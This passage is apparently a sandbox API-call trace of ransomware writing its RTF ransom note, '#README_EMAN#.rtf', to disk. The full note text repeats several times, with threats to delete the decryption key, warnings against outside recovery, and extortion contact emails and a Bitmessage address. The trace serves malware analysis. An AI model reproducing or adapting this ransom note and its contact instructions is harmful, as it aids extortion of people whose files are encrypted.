middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1efa298, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x80V¯\x86ñwMåBæ2Üã\x88\x16\x8f9XR¾2\x86íC\x06", lpUsedDefaultChar=0x0) returned 8717 [0267.311] WriteFile (in: hFile=0x294, lpBuffer=0x1efa298*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1efa298*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0267.318] CloseHandle (hObject=0x294) returned 1 [0267.320] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\#readme_eman#.rtf")) returned 0xffffffff [0267.321] GetLastError () returned 0x2 [0267.321] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0267.740] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0267.740] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 